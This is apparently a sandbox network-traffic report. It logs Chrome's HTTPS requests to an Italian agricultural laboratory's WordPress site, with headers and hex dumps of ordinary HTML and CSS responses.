                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:38 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:38 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 80
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2024-11-28 10:32:38 UTC80INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.4497895.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:45 UTC649OUTGET / HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:46 UTC604INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:45 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Link: <https://www.agriparadigma.it/wp-json/>; rel="https://api.w.org/", <https://www.agriparadigma.it/wp-json/wp/v2/pages/7>; rel="alternate"; type="application/json", <https://www.agriparadigma.it/>; rel=shortlink, <https://www.agriparadigma.it/en/>; rel="alternate"; hreflang="en-US", <https://www.agriparadigma.it/>; rel="alternate"; hreflang="it-IT"
                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                          Expires: Thu, 28 Nov 2024 10:32:45 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          2024-11-28 10:32:46 UTC7588INData Raw: 33 63 64 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 72 69 70 61 72 61 64 69 67 6d 61
                                                                                                                                          Data Ascii: 3cda<!doctype html><html lang="it-IT"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="https://www.agriparadigma
                                                                                                                                          2024-11-28 10:32:47 UTC7996INData Raw: 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73
                                                                                                                                          Data Ascii: gin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--pres
                                                                                                                                          2024-11-28 10:32:47 UTC2INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-11-28 10:32:47 UTC8192INData Raw: 31 66 34 30 0d 0a 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 20 2e 74 61 69 6c 6f 72 2d 35 62 30 65 39 62 35 36 36 36 62 66 66 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 20 2e 74 61 69 6c 6f 72 2d 35 62 30 65 39 62 35 36 36 36 62 66 66 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 35 62 30 65 39 62 35 36 36 36 62 66 66 20 2e 74 61 69 6c 6f 72 2d 73 65 63 74 69 6f 6e 5f 5f 63 6f 6e 74
                                                                                                                                          Data Ascii: 1f40adding-left:10px;}.tailor-ui .tailor-5b0e9b5666bff{margin-top:0px;margin-bottom:0px;}.tailor-ui .tailor-5b0e9b5666bff{padding-top:40px;padding-right:20px;padding-bottom:20px;padding-left:20px;}.tailor-ui .tailor-5b0e9b5666bff .tailor-section__cont
                                                                                                                                          2024-11-28 10:32:47 UTC7822INData Raw: 63 75 73 74 6f 6d 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 61 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 63 34 39 37 62 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 64 35 66 33 39 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 0a 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 20 23 6d 65 6e 75 2d 63 75 73 74 6f 6d 20 6c 69 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 61 3a 62 65 66 6f 72 65 7b 0a 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 6e 6f 72 6d 61 6c 20 33 30 70 78 2f 31 20 46 6f 6e 74 41 77 65 73 6f 6d
                                                                                                                                          Data Ascii: custom li.current-menu-item a{ background: #1c497b; background: #0d5f39; color: #fff; font-size: 20px; position: relative;}.widget_nav_menu #menu-custom li.current-menu-item a:before{ font: normal normal normal 30px/1 FontAwesom
                                                                                                                                          2024-11-28 10:32:47 UTC2INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-11-28 10:32:47 UTC8192INData Raw: 31 66 34 30 0d 0a 2f 61 3e 0a 09 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 31 32 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 72 69 70 61 72 61 64 69 67 6d 61 2e 69 74 2f 6c 61 62 2d 73 65 72 76 69 63 65 73 2f 66 6f 6f 64 2d 70 72 6f 64 75 63 74 73 2d 61 6e 69 6d 61 6c 2d 66 65 65 64 2f 22 20 64 61 74 61 2d 77 70 65 6c 2d 6c 69 6e 6b 3d 22 69 6e 74 65 72 6e 61 6c 22 3e 41 6c 69 6d 65 6e 74 69 20 65 20 4d 61
                                                                                                                                          Data Ascii: 1f40/a><ul class="sub-menu"><li id="menu-item-512" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512"><a href="https://www.agriparadigma.it/lab-services/food-products-animal-feed/" data-wpel-link="internal">Alimenti e Ma
                                                                                                                                          2024-11-28 10:32:47 UTC7822INData Raw: 72 3a 74 61 69 6c 6f 72 5f 67 72 69 64 5f 69 74 65 6d 3a 35 62 30 65 39 62 35 36 36 36 62 66 71 20 2d 2d 3e 3c 21 2d 2d 20 74 61 69 6c 6f 72 3a 74 61 69 6c 6f 72 5f 67 72 69 64 5f 69 74 65 6d 3a 35 62 30 65 39 62 35 36 36 36 62 66 73 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 69 6c 6f 72 2d 67 72 69 64 5f 5f 69 74 65 6d 20 74 61 69 6c 6f 72 2d 35 62 30 65 39 62 35 36 36 36 62 66 73 20 75 2d 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 3c 21 2d 2d 20 74 61 69 6c 6f 72 3a 74 61 69 6c 6f 72 5f 63 6f 6e 74 65 6e 74 3a 35 62 30 65 39 62 35 36 36 36 62 66 72 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 69 6c 6f 72 2d 65 6c 65 6d 65 6e 74 20 74 61 69 6c 6f 72 2d 63 6f 6e 74 65 6e 74 20 68 6f 6d 65 62 6f 78 20 74 61 69 6c 6f 72 2d 35 62 30
                                                                                                                                          Data Ascii: r:tailor_grid_item:5b0e9b5666bfq -->... tailor:tailor_grid_item:5b0e9b5666bfs --><div class="tailor-grid__item tailor-5b0e9b5666bfs u-text-center">... tailor:tailor_content:5b0e9b5666bfr --><div class="tailor-element tailor-content homebox tailor-5b0
                                                                                                                                          2024-11-28 10:32:47 UTC2INData Raw: 0d 0a
                                                                                                                                          Data Ascii:
                                                                                                                                          2024-11-28 10:32:47 UTC8192INData Raw: 31 66 34 30 0d 0a 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 68 6f 76 65 72 2d 62 6f 78 5f 5f 69 6e 66 6f 5f 5f 69 74 65 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 68 6f 76 65 72 2d 62 6f 78 5f 5f 69 6e 66 6f 5f 5f 69 74 65 6d 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 2e 68 6f 76 65 72 2d 62 6f 78 5f 5f 69 6e 66 6f 5f 5f 69 74 65 6d 5f 5f 68 65 61 64 69 6e 67 20 7b 0a 20
                                                                                                                                          Data Ascii: 1f40 display: flex; flex-wrap: wrap; } .hover-box__info__item { width: 50%; } .hover-box__info__item:nth-child(odd) { padding-right: 1em; }*/ .hover-box__info__item__heading {


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.4497935.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:48 UTC583OUTGET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:49 UTC300INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:48 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 28 Mar 2023 12:34:43 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 217
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:48 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:49 UTC217INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d
                                                                                                                                          Data Ascii: /*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.4497925.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:48 UTC606OUTGET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:49 UTC301INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:48 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 31 May 2023 06:59:20 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 2859
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:48 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:49 UTC2859INData Raw: 2e 77 70 63 66 37 20 2e 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 72 65 73 70 6f 6e 73 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 0a 09 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0a 09 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 6f 72 64 65 72 3a 20 30 3b 0a 09 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 77 70 63 66 37 20 66 6f 72 6d 20 2e 77 70 63 66 37 2d 72 65 73 70 6f
                                                                                                                                          Data Ascii: .wpcf7 .screen-reader-response {position: absolute;overflow: hidden;clip: rect(1px, 1px, 1px, 1px);clip-path: inset(50%);height: 1px;width: 1px;margin: -1px;padding: 0;border: 0;word-wrap: normal !important;}.wpcf7 form .wpcf7-respo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.4497915.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:48 UTC599OUTGET /wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.4 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:49 UTC301INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:48 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 27 Nov 2024 19:03:12 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 5064
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:48 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:49 UTC5064INData Raw: 23 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 2c 23 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 20 2e 63 6e 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 2e 63 6e 2d 62 75 74 74 6f 6e 2d 63 75 73 74 6f 6d 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 41 72 69 61 6c 2c 52 6f 62 6f 74 6f 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 63 6f 6f 6b 69 65 2d 6e 6f 74 69 63 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f
                                                                                                                                          Data Ascii: #cookie-notice,#cookie-notice .cn-button:not(.cn-button-custom){font-family:-apple-system,BlinkMacSystemFont,Arial,Roboto,"Helvetica Neue",sans-serif;font-weight:400;font-size:13px;text-align:center}#cookie-notice{position:fixed;min-width:100%;height:auto


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.4497945.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:48 UTC604OUTGET /wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:49 UTC302INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:49 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Fri, 18 Dec 2020 10:17:33 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 55998
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:32:49 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/css
                                                                                                                                          2024-11-28 10:32:49 UTC7890INData Raw: 68 74 6d 6c 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 3a 62 65 66 6f 72 65 2c 2a 3a 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 61 75 74 68 6f 72 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72
                                                                                                                                          Data Ascii: html{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}*,*::before,*::after{-webkit-box-sizing:inherit;-moz-box-sizing:inherit;box-sizing:inherit}.tailor-ui .tailor-author{padding:0;margin-bottom:1rem;font-size:1em;color:inher
                                                                                                                                          2024-11-28 10:32:49 UTC8000INData Raw: 74 69 6f 6e 2d 69 74 65 6d 3a 6e 6f 74 28 20 3a 6c 61 73 74 2d 63 68 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 70 78 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 74 61 62 73 2d 2d 6c 65 66 74 20 2e 74 61 69 6c 6f 72 2d 74 61 62 73 5f 5f 6e 61 76 69 67 61 74 69 6f 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 70 78 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 74 61 62 73 2d 2d 6c 65 66 74 20 2e 74 61 69 6c 6f 72 2d 74 61 62 73 5f 5f 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 7d 2e 74 61 69 6c 6f 72 2d 75 69 20 2e 74 61 69 6c 6f 72 2d 74 61 62 73 2d 2d 6c 65 66 74 20 2e
                                                                                                                                          Data Ascii: tion-item:not( :last-child){margin-right:-1px}.tailor-ui .tailor-tabs--left .tailor-tabs__navigation{float:left;margin-right:-1px}.tailor-ui .tailor-tabs--left .tailor-tabs__navigation-item{margin-bottom:0;border-right:none}.tailor-ui .tailor-tabs--left .
